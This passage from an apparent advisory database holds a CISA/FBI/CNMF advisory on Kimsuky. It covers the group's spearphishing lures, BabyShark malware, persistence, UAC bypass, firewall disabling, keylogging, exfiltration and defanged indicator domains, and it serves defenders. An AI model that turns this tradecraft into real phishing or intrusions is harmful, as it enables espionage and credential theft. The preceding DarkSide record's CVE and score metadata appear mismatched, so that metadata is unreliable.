Campaign](<https://www.varonis.com/blog/darkside-ransomware/>)\n\n[[13] McAfee: Threat Landscape Dashboard DarkSide \u2013 Ransomware](<https://www.mcafee.com/enterprise/en-us/threat-center/threat-landscape-dashboard/ransomware-details.darkside-ransomware.html>)\n\n### Revisions\n\nMay 11, 2021: Initial Version|May 12, 2021: Added additional resources|May 19, 2021: Added IOCs|July 8, 2021: Added MAR-10337802-1.v1 and associated IOCs\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-08T12:00:00", "type": "ics", "title": "DarkSide Ransomware: Best Practices for Preventing Business Disruption from Ransomware Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-27350"], "modified": "2021-07-08T12:00:00", "id": "AA21-131A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-131a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-31T15:30:49", "description": "### Summary\n\n_This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) version 7 framework. See the [ATT&CK for Enterprise version 7](<https://attack.mitre.org/versions/v7/techniques/enterprise/>) for all referenced threat actor tactics and techniques._\n\nThis joint cybersecurity advisory was coauthored by the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the U.S. Cyber Command Cyber National Mission Force (CNMF). This advisory describes the tactics, techniques, and procedures (TTPs) used by North Korean advanced persistent threat (APT) group [Kimsuky](<https://attack.mitre.org/groups/G0094/>)\u2014against worldwide targets\u2014to gain intelligence on various topics of interest to the North Korean government. The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA. For more information on HIDDEN COBRA activity, visit [https://www.us-cert.cisa.gov/northkorea](<https://us-cert.cisa.gov/northkorea>).\n\nThis advisory describes known Kimsuky TTPs, as found in open-source and intelligence reporting through July 2020. The target audience for this advisory is commercial sector businesses desiring to protect their networks from North Korean APT activity.\n\n[Click here](<https://us-cert.cisa.gov/sites/default/files/publications/TLP-WHITE_AA20-301A_North_Korean_APT_Focus_Kimsuky.pdf>) for a PDF version of this report.\n\n#### Key Findings\n\nThis advisory\u2019s key findings are:\n\n * The Kimsuky APT group has most likely been operating since 2012.\n * Kimsuky is most likely tasked by the North Korean regime with a global intelligence gathering mission.\n * Kimsuky employs common social engineering tactics, spearphishing, and watering hole attacks to exfiltrate desired information from victims.[[1](<https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia>)],[[2](<https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829>)]\n * Kimsuky is most likely to use spearphishing to gain initial access into victim hosts or networks.[[3](<https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829>)]\n * Kimsuky conducts its intelligence collection activities against individuals and organizations in South Korea, Japan, and the United States.\n * Kimsuky focuses its intelligence collection activities on foreign policy and national security issues related to the Korean peninsula, nuclear policy, and sanctions.\n * Kimsuky specifically targets:\n * * Individuals identified as experts in various fields,\n * Think tanks, and\n * South Korean government entities.[[4](<https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia>)],[[5](<https://attack.mitre.org/groups/G0094/>)],[[6](<https://www.securityweek.com/north-korea-suspected-cyber-espionage-attacks-against-south-korean-entities>)],[[7](<https://attack.mitre.org/groups/G0094/>)],[[8](<https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf>)]\n * CISA, FBI, and CNMF recommend individuals and organizations within this target profile increase their defenses and adopt a heightened state of awareness. Particularly important mitigations include safeguards against spearphishing, use of multi-factor authentication, and user awareness training.\n\n### Technical Details\n\n#### Initial Access\n\nKimsuky uses various spearphishing and social engineering methods to obtain _Initial Access_ [[TA0001](<https://attack.mitre.org/tactics/TA0001/>)] to victim networks.[[9](<https://blog.malwarebytes.com/threat-analysis/2020/04/apts-and-covid-19-how-advanced-persistent-threats-use-the-coronavirus-as-a-lure/>)],[[10](<https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html>)],[[11](<https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf>)] Spearphishing\u2014with a malicious attachment embedded in the email\u2014is the most observed Kimsuky tactic (Phishing: Spearphishing Attachment [[T1566.001](<https://attack.mitre.org/versions/v7/techniques/T1566/001/>)]).[[12](<https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia>)],[[13](<https://attack.mitre.org/groups/G0094/>)]\n\n * The APT group has used web hosting credentials\u2014stolen from victims outside of their usual targets\u2014to host their malicious scripts and tools. Kimsuky likely obtained the credentials from the victims via spearphishing and credential harvesting scripts. On the victim domains, they have created subdomains mimicking legitimate sites and services they are spoofing, such as Google or Yahoo mail.[14]\n * Kimsuky has also sent benign emails to targets, which were possibly intended to build trust in advance of a follow-on email with a malicious attachment or link. \n * Posing as South Korean reporters, Kimsuky exchanged several benign interview-themed emails with their intended target to ostensibly arrange an interview date and possibly build rapport. The emails contained the subject line \u201cSkype Interview requests of [Redacted TV Show] in Seoul,\u201d and began with a request to have the recipient appear as a guest on the show. The APT group invited the targets to a Skype interview on the topic of inter-Korean issues and denuclearization negotiations on the Korean Peninsula.\n * After a recipient agreed to an interview, Kimsuky sent a subsequent email with a malicious document, either as an attachment or as a Google Drive link within the body. The document usually contained a variant of BabyShark malware (see the Execution section for information on BabyShark). When the date of the interview drew near, Kimsuky sent an email canceling the interview.\n * Kimsuky tailors its spearphishing and social engineering approaches to use topics relevant to the target, such as COVID-19, the North Korean nuclear program, or media interviews.[[15](<https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829>)],[[16](<https://blog.malwarebytes.com/threat-analysis/2020/04/apts-and-covid-19-how-advanced-persistent-threats-use-the-coronavirus-as-a-lure/>)],[[17](<https://www.cyberscoop.com/north-korea-accelerate-commercial-espionage-meet-kims-economic-deadline/>)]\n\nKimsuky\u2019s other methods for obtaining initial access include login-security-alert-themed phishing emails, watering hole attacks, distributing malware through torrent sharing sites, and directing victims to install malicious browser extensions (_Phishing: Spearphising Link_ [[T1566.002](<https://attack.mitre.org/versions/v7/techniques/T1566/002/>)], _Drive-by Compromise _[[T1189](<https://attack.mitre.org/versions/v7/techniques/T1189/>)], _Man-in-the-Browser_ [[T1185](<https://attack.mitre.org/versions/v7/techniques/T1185/>)]).[[18](<https://attack.mitre.org/groups/G0094/>)]\n\n#### Execution\n\nAfter obtaining initial access, Kimsuky uses [BabyShark](<https://attack.mitre.org/software/S0414/>) malware and PowerShell or the Windows Command Shell for _Execution_ [[TA0002](<https://attack.mitre.org/versions/v7/tactics/TA0002/>)].\n\n * BabyShark is Visual Basic Script (VBS)-based malware. \n * First, the compromised host system uses the native Microsoft Windows utility, `mshta.exe`, to download and execute an HTML application (HTA) file from a remote system (_Signed Binary Proxy Execution: Mshta_ [[T1218.005](<https://attack.mitre.org/versions/v7/techniques/T1218/005/>)]).\n * The HTA file then downloads, decodes, and executes the encoded BabyShark VBS file.\n * The script maintains_ Persistence _[[TA0003](<https://attack.mitre.org/versions/v7/tactics/TA0003/>)] by creating a Registry key that runs on startup (_Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder_ [[T1547.001](<https://attack.mitre.org/versions/v7/techniques/T1547/001/>)]).\n * It then collects system information (_System Information Discovery_ [[T1082](<https://attack.mitre.org/versions/v7/techniques/T1082>)]), sends it to the operator\u2019s command control (C2) servers, and awaits further commands.[[19](<https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829>)],[[20](<https://attack.mitre.org/groups/G0094/>)],[[21](<https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/>)],[[22](<https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/>)]\n * Open-source reporting indicates BabyShark is delivered via an email message containing a link or an attachment (see Initial Access section for more information) (_Phishing: Spearphising Link_ [[T1566.002](<https://attack.mitre.org/versions/v7/techniques/T1566/002/>)], _Phishing: Spearphishing Attachment_ [[T1566.001](<https://attack.mitre.org/versions/v7/techniques/T1566/001>)]). Kimsuky tailors email phishing messages to match its targets\u2019 interests. Observed targets have been U.S. think tanks and the global cryptocurrency industry.[[23](<https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829>)]\n * Kimsuky uses PowerShell to run executables from the internet without touching the physical hard disk on a computer by using the target\u2019s memory (_Command and Scripting Interpreter: PowerShell _[[T1059.001](<https://attack.mitre.org/versions/v7/techniques/T1059/001/>)]). PowerShell commands/scripts can be executed without invoking `powershell.exe` through HTA files or `mshta.exe`.[[24](<https://attack.mitre.org/groups/G0094/>)],[[25](<https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/>)],[[26](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/what-is-mshta-how-can-it-be-used-and-how-to-protect-against-it/>)],[[27](<https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/>)]\n\n#### Persistence\n\nKimsuky has demonstrated the ability to establish _Persistence_ [[TA0003](<https://attack.mitre.org/versions/v7/tactics/TA0003/>)] through using malicious browser extensions, modifying system processes, manipulating the `autostart` execution, using Remote Desktop Protocol (RDP), and changing the default file association for an application. By using these methods, Kimsuky can gain login and password information and/or launch malware outside of some application allowlisting solutions.\n\n * In 2018, Kimsuky used an extension, which was available on the Google Chrome Web Store, to infect victims and steal passwords and cookies from their browsers (_Man-in-the-Browser _[[T1185](<https://attack.mitre.org/versions/v7/techniques/T1185/>)]). The extension\u2019s reviews gave it a five-star rating, however the text of the reviews applied to other extensions or was negative. The reviews were likely left by compromised Google+ accounts.[[28](<https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia>)]\n * Kimsuky may install a new service that can execute at startup by using utilities to interact with services or by directly modifying the Registry keys (_Boot or Logon Autostart Execution _[[T1547](<https://attack.mitre.org/versions/v7/techniques/T1547>)]). The service name may be disguised with the name from a related operating system function or by masquerading as benign software. Services may be created with administrator privileges but are executed under system privileges, so an adversary can also use a service to escalate privileges from Administrator to System. They can also directly start services through Service Execution.[[29](<https://attack.mitre.org/groups/G0094/>)],[[30](<https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/>)]\n * During the STOLEN PENCIL operation in May 2018, Kimsuky used the GREASE malware. GREASE is a tool capable of adding a Windows administrator account and enabling RDP while avoiding firewall rules (_Remote Services: Remote Desktop Protocol _[[T1021.001](<https://attack.mitre.org/versions/v7/techniques/T1021/001>)]).[[31](<https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia>)]\n * Kimsuky uses a document stealer module that changes the default program associated with Hangul Word Processor (HWP) documents (`.hwp` files) in the Registry (_Event Triggered Execution: Change Default File Association_ [[T1546.001](<https://attack.mitre.org/versions/v7/techniques/T1546/001>)]). Kimsuky manipulates the default Registry setting to open a malicious program instead of the legitimate HWP program (HWP is a Korean word processor). The malware will read and email the content from HWP documents before the legitimate HWP program ultimately opens the document.[[32](<https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/>)] Kimsuky also targets Microsoft Office users by formatting their documents in a `.docx` file rather than `.hwp` and will tailor their macros accordingly.[33]\n * Kimsuky maintains access to compromised domains by uploading actor-modified versions of open-source Hypertext Processor (PHP)-based web shells; these web shells enable the APT actor to upload, download, and delete files and directories on the compromised domains (_Server Software Component: Web Shell_ [[T1505.003](<https://attack.mitre.org/versions/v7/techniques/T505/003>)]). The actor often adds \u201cDinosaur\u201d references within the modified web shell codes.[34]\n\n#### Privilege Escalation\n\nKimsuky uses well-known methods for _Privilege Escalation _[[TA0004](<https://attack.mitre.org/versions/v7/tactics/TA0004/>)]. These methods include placing scripts in the Startup folder, creating and running new services, changing default file associations, and injecting malicious code in `explorer.exe`.\n\n * Kimsuky has used Win7Elevate\u2014an exploit from the Metasploit framework\u2014to bypass the User Account Control to inject malicious code into `explorer.exe` (_Process Injection_ [[T1055](<https://attack.mitre.org/versions/v7/techniques/T1055/>)]). This malicious code decrypts its spying library\u2014a collection of keystroke logging and remote control access tools and remote control download and execution tools\u2014from resources, regardless of the victim\u2019s operating system. It then saves the decrypted file to a disk with a random but hardcoded name (e.g., `dfe8b437dd7c417a6d.tmp`) in the user\u2019s temporary folder and loads this file as a library, ensuring the tools are then on the system even after a reboot. This allows for the escalation of privileges.[[35](<https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/>)]\n * Before the injection takes place, the malware sets the necessary privileges (see figure 1). The malware writes the path to its malicious Dynamic Link Library (DLL) and ensures the remote process is loaded by creating a remote thread within `explorer.exe` (_Process Injection_ [[T1055](<https://attack.mitre.org/versions/v7/techniques/T1055/>)]).[[36](<https://yoroi.company/research/the-north-korean-kimsuky-apt-keeps-threatening-south-korea-evolving-its-ttps/>)]\n\n\n\n_Figure 1: Privileges set for the injection_ [[37](<https://yoroi.company/research/the-north-korean-kimsuky-apt-keeps-threatening-south-korea-evolving-its-ttps/>)]\n\n#### Defense Evasion\n\nKimsuky uses well-known and widely available methods for _Defense Evasion_ [[TA0005](<https://attack.mitre.org/versions/v7/tactics/TA0005/>)] within a network. These methods include disabling security tools, deleting files, and using Metasploit.[[38](<https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/>)],[[39](<https://attack.mitre.org/groups/G0094/>)]\n\n * Kimsuky\u2019s malicious DLL runs at startup to zero (i.e., turn off) the Windows firewall Registry keys (see figure 2). This disables the Windows system firewall and turns off the Windows Security Center service, which prevents the service from alerting the user about the disabled firewall (see figure 2) (_Impair Defenses: Disable or Modify System Firewall _[[T1562.004](<https://attack.mitre.org/versions/v7/techniques/T1562/004/>)]).[[40](<https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/>)]\n\n\n\n_Figure 2: Disabled firewall values in the Registry_ [[41](<https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/>)]\n\n * Kimsuky has used a keylogger that deletes exfiltrated data on disk after it is transmitted to its C2 server (_Indicator Removal on Host: File Deletion _[[T1070.004](<https://attack.mitre.org/versions/v7/techniques/T1070/004/>)]).[[42](<https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/>)]\n * Kimsuky has used `mshta.exe`, which is a utility that executes Microsoft HTAs. It can be used for proxy execution of malicious `.hta` files and JavaScript or VBS through a trusted windows utility (_Signed Binary Proxy Execution: Mshta_ [[T1218.005](<https://attack.mitre.org/versions/v7/techniques/T1218/005>)]). It can also be used to bypass application allow listing solutions (_Abuse Elevation Control Mechanism: Bypass User Access Control_ [[T1548.002](<https://attack.mitre.org/versions/v7/techniques/T1548/002>)]).[[43](<https://attack.mitre.org/groups/G0094/>)],[[44](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/what-is-mshta-how-can-it-be-used-and-how-to-protect-against-it/>)]\n * Win7Elevate\u2014which was noted above\u2014is also used to evade traditional security measures. Win7Elevatve is a part of the Metasploit framework open-source code and is used to inject malicious code into explorer.exe (_Process Injection _[[T1055](<https://attack.mitre.org/versions/v7/techniques/T1055>)]). The malicious code decrypts its spying library from resources, saves the decrypted file to disk with a random but hardcoded name in the victim's temporary folder, and loads the file as a library.[[45](<https://www.securityweek.com/north-korea-suspected-cyber-espionage-attacks-against-south-korean-entities>)],[[46](<https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/>)],[[47](<https://attack.mitre.org/groups/G0094/>)]\n\n#### Credential Access\n\nKimsuky uses legitimate tools and network sniffers to harvest credentials from web browsers, files, and keyloggers (_Credential Access_ [[TA0006](<https://attack.mitre.org/versions/v7/tactics/TA0006/>)]). \n\n * Kimsuky uses memory dump programs instead of using well-known malicious software and performs the credential extraction offline. Kimsuky uses `ProcDump`, a Windows command line administration tool, also available for Linux, that allows a user to create crash dumps/core dumps of processes based upon certain criteria, such as high central processing unit (CPU) utilization (_OS Credential Dumping_ [[T1003](<https://attack.mitre.org/versions/v7/techniques/T1003/>)]). `ProcDump` monitors for CPU spikes and generates a crash dump when a value is met; it passes information to a Word document saved on the computer. It can be used as a general process dump utility that actors can embed in other scripts, as seen by Kimsuky\u2019s inclusion of `ProcDump` in the BabyShark malware.[[48](<https://www.microsoft.com/security/blog/2019/05/09/detecting-credential-theft-through-memory-access-modelling-with-microsoft-defender-atp/>)]\n * According to open-source security researchers, Kimsuky abuses a Chrome extension to steal passwords and cookies from browsers (_Man-in-the-Browser_ [[T1185](<https://attack.mitre.org/versions/v7/techniques/T1185/>)]).[[49](<https://attack.mitre.org/groups/G0094/>)],[[50](<https://www.zdnet.com/article/cyber-espionage-group-uses-chrome-extension-to-infect-victims/>)] The spearphishing email directs a victim to a phishing site, where the victim is shown a benign PDF document but is not able to view it. The victim is then redirected to the official Chrome Web Store page to install a Chrome extension, which has the ability to steal cookies and site passwords and loads a JavaScript file, named `jQuery.js`, from a separate site (see figure 3).[[51](<https://www.zdnet.com/article/cyber-espionage-group-uses-chrome-extension-to-infect-victims/>)]\n\n\n\n_Figure 3: JavaScript file, named `jQuery.js`_ [[52](<https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia>)]\n\n * Kimsuky also uses a PowerShell based keylogger, named MECHANICAL, and a network sniffing tool, named Nirsoft SniffPass (_Input Capture: Keylogging_ [[T1056.001](<https://attack.mitre.org/versions/v7/techniques/T1056/001/>)], _Network Sniffing_ [[T1040](<https://attack.mitre.org/versions/v7/techniques/T1040/>)]). MECHANICAL logs keystrokes to `%userprofile%\\appdata\\roaming\\apach.{txt,log}` and is also a \"cryptojacker,\" which is a tool that uses a victim\u2019s computer to mine cryptocurrency. Nirsoft SniffPass is capable of obtaining passwords sent over non-secure protocols.[[53](<https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia>)]\n * Kimsuky used actor-modified versions of PHProxy, an open-source web proxy written in PHP, to examine web traffic between the victim and the website accessed by the victims and to collect any credentials entered by the victim.[54]\n\n#### Discovery\n\nKimsuky enumerates system information and the file structure for victims\u2019 computers and networks (_Discovery_ [[TA0007](<https://attack.mitre.org/versions/v7/tactics/TA0007/>)]). Kimsuky appears to rely on using the victim\u2019s operating system command prompt to enumerate the file structure and system information (_File and Directory Discovery _[[T1083](<https://attack.mitre.org/versions/v7/techniques/T1083/>)]). The information is directed to `C:\\WINDOWS\\msdatl3.inc`, read by malware, and likely emailed to the malware\u2019s command server.[[55](<https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/>)]\n\n#### Collection\n\nKimsuky collects data from the victim system through its HWP document malware and its keylogger (_Collection_ [[TA0009](<https://attack.mitre.org/versions/v7/tactics/TA0009/>)]). The HWP document malware changes the default program association in the Registry to open HWP documents (_Event Triggered Execution: Change Default File Association_ [[T1546.001](<https://attack.mitre.org/versions/v7/techniques/T1546/001/>)]). When a user opens an HWP file, the Registry key change triggers the execution of malware that opens the HWP document and then sends a copy of the HWP document to an account under the adversary\u2019s control. The malware then allows the user to open the file as normal without any indication to the user that anything has occurred. The keylogger intercepts keystrokes and writes them to `C:\\Program Files\\Common Files\\System\\Ole DB\\msolui80.inc` and records the active window name where the user pressed keys (_Input Capture: Keylogging_ [[T1056.001](<https://attack.mitre.org/versions/v7/techniques/T1056/001/>)]). There is another keylogger variant that logs keystrokes into `C:\\WINDOWS\\setup.log`.[[56](<https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/>)]\n\nKimsuky has also used a Mac OS Python implant that gathers data from Mac OS systems and sends it to a C2 server (_Command and Scripting Interpreter: Python_ [[T1059.006]](<https://attack.mitre.org/versions/v7/techniques/T1059/006/>)). The Python program downloads various implants based on C2 options specified after the `filedown.php` (see figure 4).\n\n\n\n\n\n_Figure 4: Python Script targeting MacOS_ [57]\n\n#### Command and Control\n\nKimsuky has used a modified TeamViewer client, version 5.0.9104, for _Command and Control_ [[TA0011](<https://attack.mitre.org/versions/v7/tactics/TA0011/>)] (_Remote Access Software_ [[T1219](<https://attack.mitre.org/versions/v7/techniques/T1219/>)]). During the initial infection, the service \u201cRemote Access Service\u201d is created and adjusted to execute `C:\\Windows\\System32\\vcmon.exe` at system startup (_Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder_ [[T1547.001](<https://attack.mitre.org/versions/v7/techniques/T1547/001/>)]). Every time `vcmon.exe` is executed, it disables the firewall by zeroing out Registry values (_Impair Defenses: Disable or Modify System Firewall _[[T1562.004](<https://attack.mitre.org/versions/v7/techniques/T1562/004/>)]). The program then modifies the TeamViewer Registry settings by changing the `TeamViewer` strings in TeamViewer components. The launcher then configures several Registry values, including `SecurityPasswordAES`, that control how the remote access tool will work. The `SecurityPasswordAES` Registry value represents a hash of the password used by a remote user to connect to TeamViewer Client (Use Alternate Authentication Material: Pass the Hash [[T1550.002](<https://attack.mitre.org/techniques/T1550/002/>)]). This way, the attackers set a pre-shared authentication value to have access to the TeamViewer Client. The attacker will then execute the TeamViewer client `netsvcs.exe`.[[58](<https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/>)]\n\nKimsuky has been using a consistent format. In the URL used recently\u2014`express[.]php?op=1`\u2014there appears to be an option range from 1 to 3.[59]\n\n#### Exfiltration\n\nOpen-source reporting from cybersecurity companies describes two different methods Kimsuky has used to exfiltrate stolen data: via email or through an RC4 key generated as an MD5 hash or a randomly generated 117-bytes buffer (_Exfiltration _[[TA0010](<https://attack.mitre.org/versions/v7/tactics/TA0010/>)]).\n\nThere was no indication that the actor destroyed computers during the observed exfiltrations, suggesting Kimsuky\u2019s intention is to steal information, not to disrupt computer networks. Kimsuky\u2019s preferred method for sending or receiving exfiltrated information is through email, with their malware on the victim machine encrypting the data before sending it to a C2 server (_Archive Collected Data_ [[T1560](<https://attack.mitre.org/versions/v7/techniques/T1560>)]). Kimsuky also sets up auto-forward rules within a victim\u2019s email account (E_mail Collection: Email Forwarding Rule_ [[T1114.003](<https://attack.mitre.org/versions/v7/techniques/T1114/003/>)]).\n\nKimsuky also uses an RC4 key generated as an MD5 hash or a randomly generated 117-bytes buffer to exfiltrate stolen data. The data is sent RSA-encrypted (E_ncrypted Channel: Symmetric Cryptography_ [[T1573.001](<https://attack.mitre.org/versions/v7/techniques/T1573/001>)]). Kimsuky\u2019s malware constructs an 1120-bit public key and uses it to encrypt the 117-bytes buffer. The resulting data file is saved in `C:\\Program Files\\Common Files\\System\\Ole DB\\` (_Data Staged: Local Data Staging_ [[T1074.001](<https://attack.mitre.org/versions/v7/techniques/T1074/001>)]).[[60](<https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/>)]\n\n### Mitigations\n\n#### Indicators of Compromise\n\nKimsuky has used the domains listed in table 1 to carry out its objectives:\n\nFor a downloadable copy of IOCs, see[ AA20-301A.stix](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-301A.stix.xml>).\n\n_Table 1: Domains used by Kimsuky_\n\n`login.bignaver[.]com`\n\n| \n\n`nytimes.onekma[.]com`\n\n| \n\n`webuserinfo[.]com` \n \n---|---|--- \n \n`member.navier.pe[.]hu`\n\n| \n\n`nid.naver.onektx[.]com`\n\n| \n\n`pro-navor[.]com` \n \n`cloudnaver[.]com`\n\n| \n\n`read.tongilmoney[.]com`\n\n| \n\n`naver[.]pw` \n \n`resetprofile[.]com`\n\n| \n\n`nid.naver.unicrefia[.]com`\n\n| \n\n`daurn[.]org` \n \n`servicenidnaver[.]com`\n\n| \n\n`mail.unifsc[[.]com `\n\n| \n\n`naver.com[.]de` \n \n`account.daurn.pe[.]hu`\n\n| \n\n`member.daum.unikortv[.]com `\n\n| \n\n`ns.onekorea[.]me` \n \n`login.daum.unikortv[.]com `\n\n| \n\n`securetymail[.]com`\n\n| \n\n`riaver[.]site` \n \n`account.daum.unikortv[.]com `\n\n| \n\n`help-navers[.]com`\n\n| \n\n`mailsnaver[.]com` \n \n`daum.unikortv[.]com`\n\n| \n\n`beyondparallel.sslport[.]work`\n\n| \n\n`cloudmail[.]cloud` \n \n`member.daum.uniex[.]kr` | \n\n`comment.poulsen[.]work`\n\n| \n\n`helpnaver[.]com` \n \n`jonga[.]ml`\n\n| \n\n`impression.poulsen[.]work`\n\n| \n\n`view-naver[.]com` \n \n`myaccounts.gmail.kr-infos[.]com`\n\n| \n\n`statement.poulsen[.]work`\n\n| \n\n`view-hanmail[.]net` \n \n`naver.hol[.]es`\n\n| \n\n`demand.poulsen[.]work`\n\n| \n\n`login.daum.net-accounts[.]info` \n \n`dept-dr.lab.hol[.]es`\n\n| \n\n`sankei.sslport[.]work`\n\n| \n\n`read-hanmail[.]net` \n \n`Daurn.pe[.]hu`\n\n| \n\n`sts.desk-top[.]work`\n\n| \n\n`net.tm[.]ro` \n \n`Bigfile.pe[.]hu`\n\n| \n\n`hogy.desk-top[.]work`\n\n| \n\n`daum.net[.]pl` \n \n`Cdaum.pe[.]hu`\n\n| \n\n`kooo[.]gq `\n\n| \n\n`usernaver[.]com` \n \n`eastsea.or[.]kr`\n\n| \n\n`tiosuaking[.]com`\n\n| \n\n`naver.com[.]ec` \n \n`myaccount.nkaac[.]net`\n\n| \n\n`help.unikoreas[.]kr`\n\n| \n\n`naver.com[.]mx` \n \n`naver.koreagov[.]com`\n\n| \n\n`resultview[.]com`\n\n| \n\n`naver.com[.]se` \n \n`naver.onegov[.]com`\n\n| \n\n`account.daum.unikftc[.]kr`\n\n| \n\n`naver.com[.]cm` \n \n`member-authorize[.]com`\n\n| \n\n`ww-naver[.]com`\n\n| \n\n`nid.naver.com[.]se` \n \n`naver.unibok[.]kr`\n\n| \n\n`vilene.desk-top[.]work`\n\n| \n\n`csnaver[.]com` \n \n`nid.naver.unibok[.]kr`\n\n| \n\n`amberalexander.ghtdev[.]com`\n\n| \n\n`nidnaver[.]email` \n \n`read-naver[.]com`\n\n| \n\n`nidnaver[.]net`\n\n| \n\n`cooper[.]center` \n \n`dubai-1[.]com`\n\n| \n\n`coinone.co[.]in`\n\n| \n\n`nidlogin.naver.corper[.]be` \n \n`amberalexander.ghtdev[.]com`\n\n| \n\n`naver.com[.]pl`\n\n| \n\n`nid.naver.corper[.]be` \n \n`gloole[.]net`\n\n| \n\n`naver[.]cx`\n\n| \n\n`naverdns[.]co` \n \n`smtper[.]org`\n\n| \n\n`smtper[.]cz`\n\n| \n\n`naver.co[.]in` \n \n`login.daum.kcrct[.]ml`\n\n| \n\n`myetherwallet.com[.]mx`\n\n| \n\n`downloadman06[.]com` \n \n`login.outlook.kcrct[.]ml`\n\n| \n\n`myetherwallet.co[.]in `\n\n| \n\n`loadmanager07[.]com` \n \n`top.naver.onekda[.]com`\n\n| \n\n`com-download[.]work`\n\n| \n\n`com-option[.]work` \n \n`com-sslnet[.]work`\n\n| \n\n`com-vps[.]work`\n\n| \n\n`com-ssl[.]work` \n \n`desk-top[.]work`\n\n| \n\n`intemet[.]work`\n\n| \n\n`jp-ssl[.]work` \n \n`org-vip[.]work`\n\n| \n\n`sslport[.]work`\n\n| \n\n`sslserver[.]work` \n \n`ssltop[.]work`\n\n| \n\n`taplist[.]work`\n\n| \n\n`vpstop[.]work` \n \n`webmain[.]work`\n\n| \n\n`preview.manage.org-view[.]work`\n\n| \n\n`intranet.ohchr.account-protect[.]work` \n \n_Table 2: Redacted domains used by Kimsuky_\n\n`[REDACTED]/home/dwn[.]php?van=101`\n\n| \n\n`[REDACTED]/home/dwn[.]php?v%20an=101`\n\n| \n\n`[REDACTED]/home/dwn[.]php?van=102` \n \n---|---|--- \n \n`[REDACTED]/home/up[.]php?id=NQDPDE`\n\n| \n\n`[REDACTED]/test/Update[.]php?wShell=201`\n\n| \n\n` ` \n \n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<https://www.fbi.gov/contact-us/field-offices>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>).\n\n**_DISCLAIMER_**\n\n_This information is provided \"as is\" for informational purposes only. The United States Government does not provide any warranties of any kind regarding this information. In no event shall the United States Government or its contractors or subcontractors be liable for any damages, including but not limited to, direct, indirect, special or consequential damages, arising out of, resulting from, or in any way connected with this information, whether or not based upon warranty, contract, tort, or otherwise, whether or not arising out of negligence, and whether or not injury was sustained from, or arose out of the results of, or reliance upon the information._\n\n_The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific 